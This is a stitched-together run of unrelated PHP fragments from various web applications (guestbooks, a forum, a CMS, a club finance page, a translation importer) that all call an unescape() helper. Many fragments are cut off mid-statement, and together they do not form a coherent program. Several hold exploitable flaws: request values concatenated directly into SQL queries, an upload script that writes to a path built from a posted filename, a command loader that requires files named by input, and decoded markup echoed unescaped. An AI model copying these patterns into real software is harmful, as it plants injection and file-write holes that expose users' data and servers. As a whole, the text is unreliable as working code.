function smarty_function_mtfarkurl($args, &$ctx) { $entry = $ctx->stash('entry'); $permalink = $ctx->tag('MTEntryPermalink'); $link = 'http://cgi.fark.com/cgi/fark/farkit.pl'; $link .= '?h=' . htmlentities($entry['entry_title']); $link .= '&u=' . unescape($permalink); return $link; }
function conv_codage($txt, $d, $enc) { if ($d == 'utf8') { $ret = $enc ? utf8_encode(utf8_encode($txt)) : utf8_decode_b($txt); } elseif ($d == 'base64') { $ret = $enc ? base64_encode($txt) : base64_decode($txt); } elseif ($d == 'htmlentities') { $ret = $enc ? htmlentities($txt, ENT_QUOTES, 'ISO-8859-15', false) : html_entity_decode($txt); } elseif ($d == 'url') { $ret = $enc ? urlencode($txt) : urldecode($txt); } elseif ($d == 'unescape') { $ret = $enc ? $ret : unescape($txt, ""); } elseif ($d == 'ascii') { if ($enc) { $ret = ascii_encode($txt); } else { $ret = mb_convert_encoding($txt, 'ASCII') . "\r"; } } elseif ($d == 'binary') { $ret = $enc ? ascii2bin($txt) : bin2ascii($txt); } elseif ($d == 'bin/dec') { $ret = $enc ? decbin($txt) : bindec($txt); } elseif ($d == 'timestamp') { $ret = $enc ? strtotime($txt) : date('d/m/Y H:i:s', $txt); } elseif ($d == 'php') { $ret = clean_code($txt); } return stripslashes($ret); }
function getHttpVal($key, $defaultVal) { $val = $defaultVal; if (array_key_exists($key, $_GET)) { $val = $_GET[$key]; } else { if (array_key_exists($key, $_POST)) { $val = $_POST[$key]; } } $v = unescape(trim($val)); return $v; }
function cmd($cmd) { global $options; $options = explode(" ", $cmd); $script = unescape(array_shift($options)); for ($ind = 0; $ind < count($options); $ind++) { $options[$ind] = unescape($options[$ind]); } if (is_file("commands/" . $script . ".php")) { require_once "commands/" . $script . ".php"; } else { echo "未找到命令:" . $script; } }
public function update() { //输出gb2312码,ajax默认转的是utf-8 header("Content-type: text/html; charset=utf-8"); if (!isset($_POST['author']) or !isset($_POST['content'])) { alert('非法操作!', 3); } //读取数据库和缓存 $pl = M('guestbook'); $config = F('basic', '', './Web/Conf/'); //相关判断 if (Session::is_set('posttime')) { $temp = Session::get('posttime') + $config['postovertime']; if (time() < $temp) { echo "请不要连续发布!"; exit; } } //准备工作 if ($config['bookoff'] == 0) { $data['status'] = 0; } //先解密js的escape $data['author'] = htmlspecialchars(unescape($_POST['author'])); $data['content'] = htmlspecialchars(trim(unescape($_POST['content']))); $data['title'] = htmlspecialchars(trim(unescape($_POST['title']))); $data['tel'] = htmlspecialchars(trim(unescape($_POST['tel']))); $data['ip'] = remove_xss(htmlentities(get_client_ip())); $data['addtime'] = date('Y-m-d H:i:s'); //处理数据 if ($pl->add($data)) { Session::set('posttime', time()); if ($config['bookoff'] == 0) { echo '发布成功,留言需要管理员审核!'; exit; } else { echo '发布成功!'; exit; } } else { echo '发布失败!'; exit; } }
public function __construct($install = false) { // Connect to DB (mysqli) // Compat: if DB_FILE instead of the DSN is defined then assume SQLITE and make a DSN out of it if (!$install) { if (!defined('DB_DSN') && defined('DB_FILE')) { define('DB_DSN', 'sqlite:' . DIR_EXEC . DB_FILE); } $this->_db = new PDOe(DB_DSN, null, null, array(PDO::ERRMODE_EXCEPTION)); } // Instance of Smarty templates system $this->_smarty = new Smarty(); $this->_smarty->template_dir = DIR_TPL; $this->_smarty->compile_dir = DIR_TPL_COMPILE; $this->_smarty->debugging = false; //$this->_smarty->caching = true; // Force a new compile for every request (only for dev) $this->_smarty->force_compile = false; $this->_smarty->register_modifier('decode', array(&$this, 'decode')); // Assign constants with Smarty foreach ($this->_getConstants() as $k => $v) { $this->smartyAssign($k, $v); } $this->_session =& $_SESSION[APP]; $this->_request = unescape($_REQUEST); $this->_post = unescape($_POST); $this->_get = unescape($_GET); $this->_cookie = unescape($_COOKIE); $this->_files = unescape($_FILES); $this->_server =& $_SERVER; $this->_env =& $_ENV; // Create json class $this->_json = new Services_JSON(); if ($install) { $this->_lang = 'en'; } $this->loadLanguage($this->getLang()); if (isset($this->_request['ajax'])) { $this->_ajax = true; } if (isset($this->_request['tpl'])) { $this->_tpl = $this->_request['tpl']; } }
public function update() { //输出utf-8码,ajax默认转的是utf-8 header("Content-type: text/html; charset=utf-8"); if (!isset($_POST['aid']) or !isset($_POST['author']) or !isset($_POST['content'])) { $this->error('非法操作!'); } //读取数据库和缓存 $pl = M('pl'); $config = F('basic', '', './Web/Conf/'); $data['ip'] = htmlentities(get_client_ip()); //先解密js的escape $data['author'] = htmlspecialchars(unescape($_POST['author'])); //使用stripslashes 反转义,防止服务器开启自动转义 $data['content'] = htmlspecialchars(trim(stripslashes(unescape($_POST['content'])))); $data['ptime'] = date('Y-m-d H:i:s'); $data['aid'] = intval($_POST['aid']); if (Session::is_set('pltime')) { $temp = Session::get('pltime') + $config['postovertime']; if (time() < $temp) { echo "请不要连续发布!"; exit; } } if ($config['pingoff'] == 0) { $data['status'] = 0; } if ($pl->add($data)) { Session::set('pltime', time()); if ($config['pingoff'] == 0) { echo "发布成功,评论需要管理员审核!"; exit; } else { echo "发布成功!"; exit; } } else { echo "发布失败!"; exit; } }
function getLine($synset, $w, $comment) { # TODO??: avoid colloqial as first entry, otherwise "gehen" has # a meaning "gehen (umgangssprachlich)" which is confusing? $str = ""; foreach ($synset as $s) { # FIXME: some words don't have synonyms, these should be ignored if ($s != $w || sizeof($synset) == 1) { $s = avoidPipe($s); if ($comment != '') { $str .= "|" . unescape($s . $comment); } else { $str .= "|" . unescape($s); } } } if ($str == "-") { return ""; } return $str; }
public static function get($item, $type = 'any') { switch ($type) { case 'post': if (isset($_POST[$item])) { return unescape($_POST[$item]); } break; case 'get': if (isset($_GET[$item])) { return unescape($_GET[$item]); } break; case 'any': if (isset($_POST[$item])) { return unescape($_POST[$item]); } elseif (isset($_GET[$item])) { return unescape($_GET[$item]); } break; } return ''; }
$py = $y - 1; } if ($nm > 12) { $nm = 1; $ny = $y + 1; } $akt = mktime(0, 0, 0, $m, 1, $y); # aktuelle timestamp $aka = date('Y-m-d', $akt); $ake = date('Y-m-d', mktime(0, 0, 0, $m, date('t', $akt), $y)); $jakt = mktime(0, 0, 0, 1, 1, $y); # atkueller jahr timestamp $jaka = date('Y-m-d', $jakt); $jake = date('Y-m-d', mktime(0, 0, 0, 12, date('t', mktime(0, 0, 0, 12, 1, $y)), $y)); $kontodaten = db_result(db_query("SELECT t1 FROM prefix_allg WHERE k = 'kasse_kontodaten'"), 0); $kontodaten = unescape($kontodaten); $kontodaten = bbcode($kontodaten); $tpl = new tpl('kasse.htm'); $tpl->set('kontodaten', $kontodaten); $tpl->set('minus', db_result(db_query("SELECT ROUND(SUM(betrag),2) FROM prefix_kasse WHERE betrag < 0"), 0)); $tpl->set('plus', db_result(db_query("SELECT ROUND(SUM(betrag),2) FROM prefix_kasse WHERE betrag > 0"), 0)); $tpl->set('saldo', db_result(db_query("SELECT ROUND(SUM(betrag),2) FROM prefix_kasse"), 0)); $tpl->set('Jminus', db_result(db_query("SELECT ROUND(SUM(betrag),2) FROM prefix_kasse WHERE betrag < 0 AND datum >= '" . $jaka . "' AND datum <= '" . $jake . "'"), 0)); $tpl->set('Jplus', db_result(db_query("SELECT ROUND(SUM(betrag),2) FROM prefix_kasse WHERE betrag > 0 AND datum >= '" . $jaka . "' AND datum <= '" . $jake . "'"), 0)); $tpl->set('Jsaldo', db_result(db_query("SELECT ROUND(SUM(betrag),2) FROM prefix_kasse WHERE datum >= '" . $jaka . "' AND datum <= '" . $jake . "'"), 0)); $tpl->set('Mminus', db_result(db_query("SELECT ROUND(SUM(betrag),2) FROM prefix_kasse WHERE betrag < 0 AND datum >= '" . $aka . "' AND datum <= '" . $ake . "'"), 0)); $tpl->set('Mplus', db_result(db_query("SELECT ROUND(SUM(betrag),2) FROM prefix_kasse WHERE betrag > 0 AND datum >= '" . $aka . "' AND datum <= '" . $ake . "'"), 0)); $tpl->set('Msaldo', db_result(db_query("SELECT ROUND(SUM(betrag),2) FROM prefix_kasse WHERE datum >= '" . $aka . "' AND datum <= '" . $ake . "'"), 0)); $tpl->set('month', $lang[date('F', $akt)]); $tpl->set('pm', $pm); $tpl->set('nm', $nm);
/** * Get config option from database * * @param integer $user_id Current user ID * @param string $name Parameter name * @param string $returned_value If a value does exist it will be returned through * this parameter which is passed by reference * @return boolean */ function get_config_option($user_id, $name, &$returned_value) { if (trim($name) === '') { return false; } $query = sprintf(' SELECT `value` FROM user_preferences WHERE user %s AND parameter = "%s"; ', is_null($user_id) ? 'IS NULL' : '= \'' . escape_check($user_id) . '\'', $name); $config_option = sql_value($query, null); if (is_null($config_option)) { return false; } $returned_value = unescape($config_option); return true; }
require_once 'bbs_public.php'; if (!defined('ROOT')) { exit('can\'t access!'); } //暂时允许用户未登录评论! //验证用户登陆相关操作 //$admin = new action_admin(); if (isset($_POST['reply'])) { if (!isset($_POST['verify']) || strtolower(trim($_POST['verify'])) != strtolower($_SESSION['verify'])) { echo -1; //输入-1表示验证码输入错误! exit; } $data = array(); $_POST['content'] = unescape($_POST['content']); $data['aid'] = isset($_POST['aid']) ? intval($_POST['aid']) : exit(0); $data['tid'] = isset($_POST['tid']) ? intval($_POST['tid']) : 0; $data['content'] = isset($_POST['content']) ? $_POST['content'] : exit(0); $data['username'] = isset($_COOKIE['username']) ? $_COOKIE['username'] : ''; //$data['userid'] = $admin->userid; $data['addtime'] = mktime(); $data['ip'] = $_SERVER['REMOTE_ADDR']; $reply = db_bbs_reply::getInstance(); $r = $reply->inserData($data); if ($r) { $archive = db_bbs_archive::getInstance(); $archive->updateClickReply($data['aid'], 'replynum'); $_SESSION['verify'] = ''; echo 1; //输入1表示成功发表评论
<?php header('Content-type: text/plain'); // secure page require 'login.php'; // $debug=true; debug_msg("User is logged in as " . $username); $filepath = "users/" . $username; // File upload details $filename = $_POST["filename"]; $pathname = "../run/" . $filepath . "/" . $filename . ".xml"; debug_msg("The file is being saved in " . $pathname); $data = unescape($_POST["data"]); // Open (create if needs be) the file and write the data $file = fopen($pathname, "w"); if (file_exists($pathname)) { fwrite($file, $data); fclose($file); debug_msg("File written"); // select database open_db(); // Is there a file in the DB with this name & path? $sql = "SELECT file_id FROM file WHERE file_name='{$filename}' AND file_path='{$filepath}';"; $date = date("Y-m-d"); $reply = "File {$filename} "; if ($key = query_one_item($sql)) { $sql = "UPDATE file SET file_date='" . $date . "' WHERE file_id = " . $key . ";"; $reply .= "updated."; } else { $sql = "INSERT INTO file (file_date, file_author, file_path, file_name) " . "VALUES ('" . $date . "','" . $username . "','" . $filepath . "','" . $filename . "')"; $reply .= "created.";
$contect .= "<td nowrap width='40' >序号</td>"; $contect .= "<td nowrap width='270'>企业名称</td>"; $contect .= "<td nowrap >联系人</td>"; $contect .= "<td nowrap >联系电话</td>"; $contect .= "<td nowrap >城市</td>"; $contect .= "<td nowrap style='cursor:hand' onclick=loadmemberbuy('resort','joindate',document.getElementById('nowpage').value,document.getElementById('pagecount').value)>加入日期<span id=joindate>{$joindate}</span></td>"; $contect .= "<td nowrap style='cursor:hand' onclick=loadmemberbuy('resort','lasthf',document.getElementById('nowpage').value,document.getElementById('pagecount').value)>最后回访日期<span id=lasthf>{$lasthf}</span></td>"; $contect .= "<td nowrap >最近回访摘要</td>"; $contect .= "<td nowrap>操作区</td>"; $contect .= "</tr>"; if (!empty($atcompany)) { $atcompany = iconv('utf-8', 'gbk', unescape($atcompany)); $querywhere .= " and fd_webcus_name like '%{$atcompany}%'"; } if (!empty($atcity)) { $atcity = iconv('utf-8', 'gbk', unescape($atcity)); $querywhere .= " and (fd_provinces_name like '%{$atcity}%' or fd_city_name like '%{$atcity}%')"; } $beginpage = ($page - 1) * $pagecount; //会员资料 $query = "select fd_webcus_id,fd_webcus_allname,\n fd_city_name , fd_webcus_newtime as joindate ,fd_provinces_name ,\n fd_webcus_lasthfdate as lasthf,fd_webcus_lasthfcontect\n\tfrom tb_webcustomer \n\tleft join tb_city on fd_city_code = fd_webcus_city\n\tleft join tb_provinces on fd_provinces_code = fd_webcus_provinces\n\twhere fd_webcus_erpcusid <> 0 {$querywhere} order by {$sort} {$sorttype} limit {$beginpage},{$pagecount}\n\t"; $db->query($query); if ($db->nf()) { $v = 0; while ($db->next_record()) { $cusid = $db->f(fd_webcus_id); if ($v == 0) { $vv = "where fd_webcus_id = '{$cusid}'"; } else { $vv .= " or fd_webcus_id = '{$cusid}'"; }
$decodedStr .= $charAt; $pos++; } } if ($iconv_to != "UTF-8") { $decodedStr = iconv("UTF-8", $iconv_to, $decodedStr); } return $decodedStr; } require_once '../../config/config.inc.php'; require_once '../../config/db_connect.inc.php'; require_once '../../language_files/language.inc.php'; require_once '../../pages/CCirculation.inc.php'; header("Content-Type: text/xml; charset={$DEFAULT_CHARSET}"); $strFiter = strip_tags($_REQUEST['strFilter']); $strFiter = ltrim(unescape($strFiter, $DEFAULT_CHARSET)); $objCirculation = new CCirculation(); $arrIndex = $objCirculation->filterUsers($strFiter); ?> <table cellpadding="2" cellspacing="0" style="background-color:white;" width="100%"> <tbody id="AvailableUsers"> <?php $nMax = sizeof($arrIndex); for ($nIndex = 0; $nIndex < $nMax; $nIndex++) { $arrCurIndex = $arrIndex[$nIndex]; $nUserId = $arrCurIndex['user_id']; $arrUser = $objCirculation->getUserById($nUserId); $sid = $nUserId; ?> <tr onMouseOver="this.style.background = '#ddd;'" onMouseOut="this.style.background = '#fff;'" onClick="document.getElementById('receiver_<?php echo $sid;
# Get the matching string name $SQL = "SELECT s.string_id, s.value, tr.value as tr_last, tr.possibly_incorrect as tr_last_fuzzy, trv.value as ever_tr_value\r\n\t\t\t\t\t\t\tFROM strings as s\r\n\t\t\t\t\t\t\tleft join translations as tr on (s.string_id = tr.string_id\r\n\t \t\t\t\t\tand tr.language_id = {$language_id}\r\n\t \t\t\t\t\tand tr.is_active)\r\n\t \t\t\t\t\tleft join translations as trv on (s.string_id = trv.string_id\r\n\t \t\t\t\t\tand trv.language_id = {$language_id}\r\n\t \t\t\t\t\tand trv.value = '" . addslashes(unescape($tags[1])) . "')\r\n\t\t\t\t\t\t\tWHERE s.is_active = 1 AND s.non_translatable <> 1 AND s.file_id = " . $file_id . " AND s.name = '" . $tags[0] . "'"; $rs_string = mysql_query($SQL, $dbh); $myrow_string = mysql_fetch_assoc($rs_string); if ($myrow_string['string_id'] > 0 && $tags[1] != "" && $myrow_string['ever_tr_value'] == "" && $tags[1] != $myrow_string['value']) { $insert_as_fuzzy = 0; if ($myrow_string['tr_last'] != "" && $fuzzy == 1 && $myrow_string['tr_last_fuzzy'] == 0) { # This incoming translation is replacing an existing value that is *not* marked as fuzzy # And the $fuzzy == 1, so we may be replacing a known good value !! $insert_as_fuzzy = 1; } else { ## Nothing. Insert as non-fuzzy. ## If this is replacing a fuzzy value, then that's a good thing } echo " Found string never translated to this value: " . $myrow_string['string_id'] . " value: " . $myrow_string['value'] . "\n"; $SQL = "UPDATE translations set is_active = 0 where string_id = " . $myrow_string['string_id'] . " and language_id = '" . $language_id . "'"; mysql_query($SQL, $dbh); $SQL = "INSERT INTO translations (translation_id, string_id, language_id, version, value, possibly_incorrect, is_active, userid, created_on)\r\n\t\t\t\t\t\t\t\tVALUES (\r\n\t\t\t\t\t\t\t\t\tNULL, " . $myrow_string['string_id'] . ", \r\n\t\t\t\t\t\t\t\t\t" . $language_id . ", 0, '" . addslashes(unescape($tags[1])) . "', {$insert_as_fuzzy}, 1, " . $USER . ", NOW()\r\n\t\t\t\t\t\t\t\t)"; mysql_query($SQL, $dbh); # echo $SQL; } } } } } } else { echo " Cannot find a file for: " . $line . "\n"; } } } echo "Done.\n\n";
$zu_list = ''; $zusortable = ''; foreach ($ggclz as $key => $value) { if ($value) { if ($value == $ggclzu) { $zu_list .= '<option value="' . htmlspecialchars($value) . '" title="' . htmlspecialchars($value) . '" selected="selected">' . htmlspecialchars(cutstr($value, 10)) . '</option>'; } else { $zu_list .= '<option value="' . htmlspecialchars($value) . '" title="' . htmlspecialchars($value) . '">' . htmlspecialchars(cutstr($value, 10)) . '</option>'; } $zusortable .= '<li class="val ui-state-default"><span class="ui-icon ui-icon-arrowthick-2-n-s" title="可上下移动"></span><span class="ui-icon ui-icon-close" title="删除此组"></span>' . htmlspecialchars($value) . '</li>'; } } $sub_pages = $page < 1000 ? 10 : ($page < 10000 ? 7 : 5); $subpageurl = 'listggcl.php?desc=' . $_REQUEST['desc'] . '&limit=' . $limit . '&ggcllei=' . urlencode($ggcllei) . '&ggclzu=' . urlencode($ggclzu) . '&search=' . urlencode(unescape($search)) . '&page='; $fenye = new fenye($size, $limit, $page, $sub_pages, $subpageurl, 1); $nav = $fenye->jieguo . ' <label>搜索<input class="search ui-widget-content" name="search" type="text" title="输入搜索内容,按回车或失去焦点" value="' . htmlspecialchars(unescape($search)) . '" /></label> <label>分类<select class="ggcllei ui-widget-content" name="ggcllei"><option value="-1">所有广告策略</option>' . $lei_list . '</select></label> <label>分组<select class="ggclzu ui-widget-content" name="ggclzu"><option value="-1">所有广告策略</option>' . $zu_list . '</select></label> <label title="列表升序排列,小到大"><input type="radio" name="desc" value="1"' . ($desc ? '' : ' checked="checked"') . ' />升序</label><label title="列表降序排列,大到小"><input type="radio" name="desc" value="0"' . ($desc ? ' checked="checked"' : '') . ' />降序</label>'; $title = '广告策略管理'; require 'mo.head.php'; ?> <style type="text/css"> input.limit{ width: 1.5em; } input.page{ width: 1em; } input.search{ width: 4em; } th.uith{ border-width:1px 1px 0px 0px;
$class_concent .= $tagstr . '</span>'; } $news['content'] .= $class_concent; $news['content1'] .= $class_concent; $news['content2'] .= $class_concent; $news['content3'] .= $class_concent; $news['content4'] .= $class_concent; $news['content'] = contentshow('<div>' . $news['content'] . '</div>'); $news['content1'] = contentshow('<div>' . $news['content1'] . '</div>'); $news['content2'] = contentshow('<div>' . $news['content2'] . '</div>'); $news['content3'] = contentshow('<div>' . $news['content3'] . '</div>'); $news['content4'] = contentshow('<div>' . $news['content4'] . '</div>'); $news['url'] = request_uri(); if ($metinfonow == $met_member_force and $met_webhtm) { $html_filenamex = str_replace("\\", '', $html_filename); $html_filenamex = unescape($html_filenamex); $news['url'] = $met_weburl . $class_list[$class1]['foldername'] . '/' . $html_filenamex . $met_htmtype; } if ($pagemark == 3 || $pagemark == 5) { if ($news['displayimg'] != '') { $displayimg = explode('|', $news['displayimg']); $pg = count($displayimg); for ($i = 0; $i < $pg; $i++) { $newdisplay = explode('*', $displayimg[$i]); $displaylist[$i]['title'] = $newdisplay[0]; $displaylist[$i]['imgurl'] = $newdisplay[1]; $imgurl_diss = explode('/', $displaylist[$i]['imgurl']); $displaylist[$i][imgurl_dis] = $imgurl_diss[0] . '/' . $imgurl_diss[1] . '/' . $imgurl_diss[2] . '/thumb_dis/' . $imgurl_diss[count($imgurl_diss) - 1]; $filename = stristr(PHP_OS, "WIN") ? @iconv("utf-8", "gbk", $displaylist[$i][imgurl_dis]) : $displaylist[$i][imgurl_dis]; $displaylist[$i][imgurl_dis] = file_exists($filename) ? $displaylist[$i][imgurl_dis] : $displaylist[$i]['imgurl']; }
foreach (unescape($list_fields) as $list_field) { $fields[] = $list_field['name']; } ?> wyf.listView.setFields(<?php echo json_encode($fields); ?> ); wyf.listView.init(); }) </script> <script type="text/html" id="wyf_list_view_template"> <table id="wyf_list_table"> <thead> <tr><?php foreach (unescape($list_fields) as $field) { echo "<th>{$field['label']}</th>"; } ?> <th></th></tr> </thead> <tbody> {{#list}} <tr><?php // Columns foreach ($list_fields as $field) { echo sprintf("<td>{{%s}}</td>", str_replace(".", "_", $field['name'])); } ?> <td class="wyf_list_table_operations"><?php //Operations
echo $lang["managemycollections"]; ?> </h1> <p class="tight"><?php echo text("introtext"); ?> </p><br> <div class="BasicsBox"> <form method="post" action="<?php echo $baseurl_short; ?> pages/collection_manage.php"> <div class="Question"> <div class="tickset"> <div class="Inline"><input type=text name="find" id="find" value="<?php echo htmlspecialchars(unescape($find)); ?> " maxlength="100" class="shrtwidth" /></div> <div class="Inline"><input name="Submit" type="submit" value=" <?php echo $lang["searchbutton"]; ?> " /></div> <div class="Inline"><input name="Clear" type="button" onclick="document.getElementById('find').value='';submit();" value=" <?php echo $lang["clearbutton"]; ?> " /></div> </div> <div class="clearerleft"> </div> </div> </form> </div>
$commentHiddenStyle = ""; } if ($permissions['viewip']) { $viewIP = " - IP: " . $accountData['ip']; } $bbParser->parse($mData['comment']); echo "<div class='commentContainer'>\n\t\t<div class='commentDate{$commentHiddenStyle}'>\n\t\t\t<table>\n\t\t\t\t<tr>\n\t\t\t\t\t<td width='887'>\n\t\t\t\t\t\t" . customDate($mData['date']) . " {$viewIP}\n\t\t\t\t\t</td>\n\n\t\t\t\t\t<td>\n\t\t\t\t\t\t<a href='thread?id=" . $mData['thread'] . "#COMMENT-" . $mData['id'] . "'>\n\t\t\t\t\t\t\tView Thread\n\t\t\t\t\t\t</a>\n\t\t\t\t\t</td>\n\t\t\t\t</tr>\n\t\t\t</table>\n\t\t</div>\n\n\t\t<div class='commentMain' style='box-shadow: 0px 5px 20px " . getPostShadow($mData['poster']) . ";'>\n\t\t\t<table>\n\t\t\t\t<tr>\n\t\t\t\t\t<td width='200'>\n\t\t\t\t\t\t<a href='user?id=" . $mData['poster'] . "' data-tooltip='View Profile: {$commentPoster}'>\n\t\t\t\t\t\t\t<div class='commentUser'>\n\t\t\t\t\t\t\t\t<div class='bold'>\n\t\t\t\t\t\t\t\t\t" . userNameTags($mData['poster'], $commentPoster) . "\n\t\t\t\t\t\t\t\t</div>\n\n\t\t\t\t\t\t\t\t<br>\n\n\t\t\t\t\t\t\t\t" . $accountData['usertitle'] . "\n\t\t\t\t\t\t\t</div>\n\t\t\t\t\t\t</a>\n\n\t\t\t\t\t\t<br> <br>\n\n\t\t\t\t\t\t<img src='" . $accountData['avatar'] . "' data-noenlarge='true' " . getAvatarStyle($mData['poster']) . ">\n\n\t\t\t\t\t\t<br> <br> <br>\n\n\t\t\t\t\t\t<span class='bold'>Posts:</span> " . getPostCount($mData['poster']) . " <br>\n\t\t\t\t\t\t<span class='bold'>Country:</span> " . $accountData['country'] . "\n\t\t\t\t\t</td>\n\n\t\t\t\t\t<td width='20'></td>\n\n\t\t\t\t\t<td width='900'>\n\t\t\t\t\t\t<div class='commentText'>\n\t\t\t\t\t\t\t" . nl2br(unescape($bbParser->getAsHtml())) . ""; storePermissions($mData['poster']); if ($temporaryPermissions['allowsignature'] && $accountData['signature'] && strlen($accountData['signature']) <= $temporaryPermissions['maxsignature'] && substr_count($accountData['signature'], "\n") <= $temporaryPermissions['maxsignaturelines']) { echo "<br><br> ____________________________________________________________________ <br><br>"; if ($temporaryPermissions['signaturebbcode']) { $bbParser->parse($accountData['signature']); if ($temporaryPermissions['signatureimage']) { echo nl2br(unescape($bbParser->getAsHtml())); } else { echo str_replace("<img", "[IMG", nl2br(unescape($bbParser->getAsHtml()))); } } } echo "<br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br> <div align='left'>"; if ($permissions['downloadattachments']) { $attachmentsQuery = $mysql->query("SELECT `id`, `path` FROM `attachments` WHERE `thread` = '0' AND `post` = '" . escape($mData['id']) . "'"); while ($attachmentsData = $attachmentsQuery->fetch_assoc()) { echo "<a href='downloadattachment?id=" . $attachmentsData['id'] . "' target='_blank'>\n\t\t\t\t\t\t\t\t\t\t<div data-tooltip='Attachment: " . round(filesize($attachmentsData['path']) / 1024, 1) . " KB' class='attachmentsBox'>\n\t\t\t\t\t\t\t\t\t\t\t" . basename($attachmentsData['path']) . ""; if ($permissions['deleteattachment']) { echo " <a href='deleteattachment?id=" . $attachmentsData['id'] . "'>[Delete]</a>"; } echo "</div>\t\n\t\t\t\t\t\t\t\t\t</a>"; } echo "<br><br><br>"; }
// bilder abfragen $limit = $img_per_site; $page = $menu->getA(3) == 'p' ? $menu->getE(3) : 1; $MPL = db_make_sites($page, '', $limit, 'index.php?user-usergallery-' . $uid, "usergallery` WHERE uid = " . $uid); $anfang = ($page - 1) * $limit; $erg = db_query("SELECT `name`, `besch`, `endung`, `id` FROM `prefix_usergallery` WHERE `uid` = " . $uid . " ORDER BY `id` DESC LIMIT " . $anfang . "," . $limit); $tpl->set('imgperline', $allgAr['gallery_imgs_per_line']); $tpl->set('MPL', $MPL); $tpl->out(0); $class = 'Cnorm'; $i = 0; if (db_num_rows($erg) > 0) { while ($row = db_fetch_assoc($erg)) { $class = $class == 'Cmite' ? 'Cnorm' : 'Cmite'; $row['class'] = $class; $row['besch'] = unescape($row['besch']); if (loggedin() and (is_siteadmin() or $uid == $_SESSION['authid'])) { $row['besch'] = '<a href=\'index.php?user-usergallery-' . $uid . '-p' . $page . '-d' . $row['id'] . '\'><img src=\'include/images/icons/del.gif\' border=\'0\' alt=\'löschen\' title=\'löschen\' /></a> ' . $row['besch']; } $row['width'] = round(100 / $img_per_line); if ($i != 0 and $i % $img_per_line == 0) { echo '</tr><tr>'; } $tpl->set_ar_out($row, 1); $i++; } if ($i % $img_per_line != 0) { $anzahl = $img_per_line - $i % $img_per_line; for ($x = 1; $x <= $anzahl; $x++) { echo '<td class="' . $class . '"></td>'; }
function footer() { global $output, $db, $met_htmtype, $html_filename, $metinfonow, $met_member_force, $met_webhtm, $htmpack, $lang_htmcreate, $lang_htmsuccess, $index_url, $indexy, $met_chtmtype, $adminfile; $output = str_replace(array('<!--<!---->', '<!---->', '<!--fck-->', '<!--fck', 'fck-->', '', "\r", substr($admin_url, 0, -1)), '', ob_get_contents()); $output = trim($output, "\n"); $db->close(); ob_end_clean(); if ($metinfonow == $met_member_force and $met_webhtm) { $html_filename = str_replace("\\", '', $html_filename); $html_filename = unescape($html_filename); $html_filename .= $indexy == 'index' ? $met_htmtype : ($indexy == 1 ? $met_chtmtype : $met_htmtype); if ($htmpack) { $html_filename = htmpacks($html_filename, $adminfile); } $newhtm = explode('/', $html_filename); $newhtm = $newhtm[count($newhtm) - 1]; if (stristr(PHP_OS, "WIN")) { $html_filename = @iconv("utf-8", "GBK", $html_filename); } $handle = fopen($html_filename, "w"); if (!is_writable($html_filename)) { $jsok = 2; } elseif (!fwrite($handle, $output)) { $jsok = 1; } else { $jsok = 0; } fclose($handle); echo $jsok; } else { echo $output; } exit; }
<?php require "../include/common.inc.php"; require "../include/json.php"; header('Content-Type:text/html;charset=utf-8'); $db = new db_test(); $prov = u2g(unescape($prov)); $query = "select fd_china_city as city from tb_china where fd_china_prov = '{$prov}'\n group by fd_china_city order by fd_china_areacode asc"; $db->query($query); if ($db->nf()) { while ($db->next_record()) { $arr_city_code = g2u($db->f(city)); $arr_city_name = g2u($db->f(city)); $select[] = array("id" => $arr_city_code, "title" => $arr_city_name); } } if (empty($select)) { $select[] = array("id" => "", "title" => ""); } echo json_encode($select);
redirect(""); } else { echo "The signature you have entered has too many lines. It may only have " . $permissions['maxsignaturelines'] . " lines. <br> <br>"; } } else { echo "The signature you have entered is too long. It must be below " . $permissions['maxsignature'] . " characters. <br> <br>"; } } else { echo "You may not have animated images in your signature. <br> <br>"; } } else { echo "You may not have images in your signature. <br> <br>"; } } $bbParser->parse($user['signature']); echo "<form action='' method='POST'>\n\t\t\t\t\t\t\t\t<div class='box'>\n\t\t\t\t\t\t\t\t\t<div class='boxHeading'>\n\t\t\t\t\t\t\t\t\t\tModify Signature\n\t\t\t\t\t\t\t\t\t</div>\n\n\t\t\t\t\t\t\t\t\t<div class='boxMain'>\n\t\t\t\t\t\t\t\t\t\t<div class='boxArea'>\n\t\t\t\t\t\t\t\t\t\t\t" . nl2br(unescape($bbParser->getAsHtml())) . "\n\t\t\t\t\t\t\t\t\t\t</div>\n\n\t\t\t\t\t\t\t\t\t\t<div class='boxArea'>"; if ($permissions['signaturebbcode']) { echo "<button type='button' data-tag='B' class='bbcode boxButton'>bold</button>\n\t\t\t\t\t\t\t\t\t\t\t\t<button type='button' data-tag='I' class='bbcode boxButton'>italic</button>\n\t\t\t\t\t\t\t\t\t\t\t\t<button type='button' data-tag='U' class='bbcode boxButton'>underline</button>\n\t\t\t\t\t\t\t\t\t\t\t\t<button type='button' data-tag='LEFT' class='bbcode boxButton'>left</button>\n\t\t\t\t\t\t\t\t\t\t\t\t<button type='button' data-tag='CENTER' class='bbcode boxButton'>center</button>\n\t\t\t\t\t\t\t\t\t\t\t\t<button type='button' data-tag='RIGHT' class='bbcode boxButton'>right</button>\n\t\t\t\t\t\t\t\t\t\t\t\t<button type='button' data-tag='LIST' class='bbcode boxButton'>bullet list</button>\n\t\t\t\t\t\t\t\t\t\t\t\t<button type='button' data-tag='NLIST' class='bbcode boxButton'>number list</button>\n\t\t\t\t\t\t\t\t\t\t\t\t<button type='button' data-tag='LI' class='bbcode boxButton'>list item</button>\n\t\t\t\t\t\t\t\t\t\t\t\t<button type='button' data-tag='EMAIL' class='bbcode boxButton'>email</button>"; if ($permissions['signatureimage']) { echo " <button type='button' data-tag='IMG' class='bbcode boxButton'>image</button> "; } echo "<button type='button' data-tag='QUOTE' class='bbcode boxButton'>quote</button>\n\t\t\t\t\t\t\t\t\t\t\t\t<button id='bbcode-link' type='button' data-tooltip='Example: [URL=http://example.com]Click here[/URL]' class='boxButton'>link</button>\n\t\t\t\t\t\t\t\t\t\t\t\t<button id='bbcode-font' type='button' data-tooltip='Example: [FONT=Arial]Hello world![/FONT]' class='boxButton'>font</button>\n\t\t\t\t\t\t\t\t\t\t\t\t<button id='bbcode-size' type='button' data-tooltip='Example: [SIZE=5]Hello world![/SIZE]' class='boxButton'>size</button>\n\t\t\t\t\t\t\t\t\t\t\t\t<button id='bbcode-color' type='button' data-tooltip='Example: [COLOR=RED]Hello[/COLOR] [COLOR=#00FF00]world![/COLOR]' class='boxButton'>color</button> "; if ($permissions['mentionusers']) { echo "<button type='button' 